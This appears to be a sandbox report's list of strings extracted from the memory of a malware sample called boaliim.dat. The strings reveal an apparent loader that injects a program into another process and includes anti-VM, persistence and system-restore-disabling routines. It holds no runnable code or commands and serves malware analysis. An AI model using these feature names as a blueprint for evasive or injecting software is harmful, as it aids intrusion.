Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: osminorversion1
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reserved?
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ycountchars
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: showwindow(
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rgsvcs.ex t
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antivirusntext
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _reversebs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: execute_vbs_vm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ikvvfncnn.bmp
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_path
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: logmaker
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: anti_botkillvm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: persistenceq
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: emulator_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _stringbetweenb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_contexte
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _crypt_startuph
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antitasks
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disablersv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9e5ej
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shimlt
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 520c39e26/304/6/3052_4f02_d30_2_d70c2_e///05/75f2d/50920fd43039//e6266e20444f53206d6f64652e0d0d0*24
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word machine;word numberofsections;dword timedatestamp;dword pointertosymboltable;dword numberofsymbols;
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\local\temp\rarsfx0\shjgtph.kmt4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: criticalsectiontimeout;
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tlsexpansionbitmap<
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fastpebunlockroutine%
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: numberofrvaandsizes.
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kernelcallbacktableut
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tlsexpansioncounter
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapsegmentreservee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapsegmentreserve
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapsegmentcommittat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: extendedregistersps
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: maximumnumberofheaps
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofheapreserve
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processstarterhelper
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: postprocessinitroutine
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcharacteristics
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: writeprocessmemoryut
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofstackcommit
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofheapcommit
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagebaseaddresse
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: environmentupdatecount
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapsegmentcommit
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: criticalsectiontimeout
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofstackreserver
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gdisharedhandletablez
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tlsexpansionbitmapbitsc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gdidcattributelistd
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inheritedaddressspacem
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processparametersnetv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fastpeblockroutinee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ansicodepagedatacount`
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unicodecasetabledatai
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: extendedregisters
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ansicodepagedataons
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unicodecasetabledataon
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inheritedaddressspace
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_contextset41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majorlinkerversion5-21-7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minorlinkerversionmver8
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\syswow64!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ef20f3a169*
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disablesysrestoreatae
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofoptionalheader
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountinc41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720edab4441
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountdec41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: addressofnewexeheader
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_fixreloc41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pointertorawdatans
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pointertorelocationsa
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pointertolinenumbersta
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: numberofrelocationsa
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da1ec28a691
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_dllhandlesetn
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagebaseaddress25541
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: numberofsections
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tlsexpansioncounter41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: numberoflinenumbersv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _crypt_decryptdataeph_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pointertosymboltable@
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fastpeblockroutinephi
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountssr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: addressofentrypoint{
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sectionalignment\|
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minorsubsystemversione
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majorsubsystemversionn
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sizeofuninitializeddata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: win32versionvalue
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minorimageversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majorimageversionm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201\^
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ca0024d60201\comctl32.dllt
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: en-us
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c703e6af597b4bin.sdb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: minoroperatingsystemversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_iswow64process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd3ae6ba444d620c1
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fe2ff4bb477760319f8
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da0ceea6516a6b0c
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readimagefileexecoptions
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9eb23f2a4516c7d279f
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da03e6af597b4b
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9f82ff5a1517a7e309f
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: majoroperatingsystemversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da1ce2a45f7b4034b1a0w
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qrsbbkj-7wo8i291jb09ygiu694l^
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c82fecad5d6b750ce
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemorybase3f2a0
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ed0fcb8f6f5556609f{
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\system32\ntmarta.dllb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_allocateexespace
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fexpfc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemmajorversion4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommitfreeblockthreshold#
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversionold*
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemmajorversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversionold
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cwvoayzpefzjbexpebfcjexe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommittotalfreethreshold
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommitfreeblockthreshold
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemoryheap
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlystaticserverdata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlysharedmemorybase
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommitfreeblockthresholds
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: heapdecommittotalfreethresholda
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readonlystaticserverdatah
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readimagefileexecoptionsw
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: imagesubsystemminorversionold~
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: readimagefileexecoptionsnold7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oboaliim.dat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ryoboaliim.dat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dz\temp\
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gvqj.txt
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\p
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runper
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: checkint
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: denarioy
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mainpe~
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: chrome
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cbsize
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: thread
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ysize`@
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xsize
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: title`?
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: flags
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: desktop
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eggsh[
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tagwordb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tagwordm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dr2ord
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sscs d
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segfst=
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segds"
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: seges$
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: overlay
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: seggs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pagesx]
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pages
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: magic(_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: magich_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eflags
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mutant
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spareh
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segcse
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segssj
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tagwordg
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segfs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: machinei
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: magic8t
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: utant
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ordro
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: magic
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spare2
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: closehandle
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: andle
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: closehandle0d
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segss
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segds
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: segcs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: seges
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eflagsc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nameh
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spare
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: andleb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sumethread
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dwordx
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: resumethread
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pare2$
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ygiu694lr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002k
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unionofvirtualsizeandphysicaladdressd
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9de0fe3ac427d6126889cf80esq
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ed01c99c7540460a80acc31b7c~
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71deeb255777417aa96ec3c7ck
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unionofvirtualsizeandphysicaladdress
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9de0fe3ac427d61268995eb0e7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word magic;byte majorlinkerversion;<
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unionofvirtualsizeandphysicaladdress)
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unionofvirtualsizeandphysicaladdressmp"
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\knmo\boaliim.dat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9de06c289745d400699b7ca007cz
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dword virtualaddress; dword sizeofblockg
